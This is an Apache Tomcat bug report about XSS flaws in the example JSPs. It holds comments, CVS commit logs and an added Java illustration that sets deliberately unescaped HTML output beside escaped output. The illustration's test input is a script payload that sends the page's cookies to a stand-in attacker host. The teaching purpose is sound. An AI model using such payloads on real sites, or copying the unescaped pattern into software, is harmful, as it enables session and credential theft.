Bug 32953

Summary: SERVLETAPI: XSS Issues
Product: Tomcat 5
Reporter: Mark Thomas <markt>
Component: Webapps:Examples
Assignee: Tomcat Developers Mailing List <dev>
Status: RESOLVED FIXED
Severity: blocker
Keywords: PatchAvailable
Priority: P1
Version: Nightly Build
Target Milestone: ---
Hardware: All
OS: All
Attachments: Patch for XSS issues

Description Mark Thomas 2005-01-05 12:24:34 UTC
A number of XSS issues have been reported against the examples.

I will attach a patch for jakarta-servletapi-5 that fixes the reported issues
(and a few others of a similar nature).
Comment 1 Mark Thomas 2005-01-05 12:25:19 UTC
Created attachment 13896 [details]
Patch for XSS issues
Comment 2 lala 2005-01-10 03:38:09 UTC
Hi... Are you saying that when a user successfully logs in to the Tomcat Web Application
Manager, they are able to control Tomcat?

Please advise me. Your advice is greatly appreciated. Thanks!

(In reply to comment #0)
> A number of XSS issues have been reported against the examples.
> I will attach a patch for jakarta-servletapi-5 that fixes the reported issues
> (and a few others of a similar nature).

Comment 3 Mark Thomas 2005-01-10 20:05:43 UTC
Yes, but that has nothing to do with the XSS issue.

The Manager application is for managing Tomcat. Therefore, if someone has access
to the manager application they are managing (or controlling if you prefer) Tomcat.

XSS issues provide an attacker that controls one (untrusted) web site with a
mechanism for executing code on a client as if it were from another (trusted) web
site. Try a Google search for XSS for more info.
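To make the distinction in the comment above concrete: the example JSPs named in this bug (snoop.jsp, functions.jsp and the others) echo request data back into the HTML they generate, which is exactly the reflected-XSS pattern. The following is an added illustration written for this page; it is not the attached patch and not Tomcat's own code. The JSP fragments in the comments, the class and method names, the parameter name and the attacker host are all hypothetical; the escaper mirrors what JSTL's fn:escapeXml does for HTML text and attribute content.

```java
import java.util.LinkedHashMap;
import java.util.Map;

/**
 * Added illustration (hypothetical, not the Tomcat patch): a request-echoing page
 * in the style of the example JSPs, rendered once with raw output and once with
 * escape-on-output, against a constructed attacker-supplied parameter value.
 */
public class ReflectedXssDemo {

    // Vulnerable pattern (hypothetical JSP fragment):
    //     name = <%= request.getParameter("name") %>
    // The parameter value is written straight into the HTML body.
    static String renderVulnerable(Map<String, String> params) {
        StringBuilder html = new StringBuilder("<html><body>\n");
        for (Map.Entry<String, String> e : params.entrySet()) {
            html.append("<p>").append(e.getKey()).append(" = ")
                .append(e.getValue()).append("</p>\n");   // raw, attacker-controlled
        }
        return html.append("</body></html>").toString();
    }

    // Fixed pattern (hypothetical JSP fragment):
    //     name = ${fn:escapeXml(param.name)}      or      <c:out value="${param.name}"/>
    // Both escape the value before it reaches the response.
    static String renderEscaped(Map<String, String> params) {
        StringBuilder html = new StringBuilder("<html><body>\n");
        for (Map.Entry<String, String> e : params.entrySet()) {
            html.append("<p>").append(escapeHtml(e.getKey())).append(" = ")
                .append(escapeHtml(e.getValue())).append("</p>\n");
        }
        return html.append("</body></html>").toString();
    }

    // Minimal HTML escaper using the same replacements as JSTL fn:escapeXml:
    // < > & " ' become &lt; &gt; &amp; &#034; &#039;. Safe for element text and
    // quoted attribute values; it is NOT sufficient inside <script> or on* handlers.
    static String escapeHtml(String s) {
        if (s == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&#034;"); break;
                case '\'': out.append("&#039;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Constructed request parameters, as if the victim followed an attacker's link
        // such as  /examples/snp/snoop.jsp?name=<script>...</script>  (host is hypothetical).
        Map<String, String> params = new LinkedHashMap<String, String>();
        params.put("name",
            "<script>document.location='http://attacker.example/?c='+document.cookie</script>");
        params.put("lang", "en");

        String vulnerable = renderVulnerable(params);
        String fixed = renderEscaped(params);

        System.out.println("--- raw output (browser runs the script in this site's origin) ---");
        System.out.println(vulnerable);
        System.out.println("--- escaped output (browser shows the payload as text) ---");
        System.out.println(fixed);

        // Quick self-check a reviewer of the patch would apply: no tag can survive escaping.
        System.out.println("raw page contains <script>: " + vulnerable.contains("<script>"));
        System.out.println("escaped page contains <script>: " + fixed.contains("<script>"));
    }
}
```

The point of running both renderers on the same input is that the fix is entirely on the output side: nothing about the request needs to be validated or rejected, the value just has to be encoded for the context it is written into. Escaping at every output point is what makes a patch like the one attached here review-able file by file, which is why the commits below touch each example JSP individually.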
Comment 4 Jean-Francois Arcand 2005-01-18 16:31:49 UTC
Applied the patch:

Checking in jsr152/examples/jsp2/el/functions.jsp;
/home/cvs/jakarta-servletapi-5/jsr152/examples/jsp2/el/functions.jsp,v  <--  functions.jsp
new revision: 1.5; previous revision: 1.4
done
Checking in jsr152/examples/jsp2/el/implicit-objects.jsp;
/home/cvs/jakarta-servletapi-5/jsr152/examples/jsp2/el/implicit-objects.jsp,v  <--  implicit-objects.jsp
new revision: 1.4; previous revision: 1.3
done
More commits to come...
Checking in jsr152/examples/jsp2/jspx/textRotate.jspx;
/home/cvs/jakarta-servletapi-5/jsr152/examples/jsp2/jspx/textRotate.jspx,v  <--  textRotate.jspx
new revision: 1.4; previous revision: 1.3
done
More commits to come...
Checking in jsr152/examples/snp/snoop.jsp;
/home/cvs/jakarta-servletapi-5/jsr152/examples/snp/snoop.jsp,v  <--  snoop.jsp
new revision: 1.3; previous revision: 1.2
done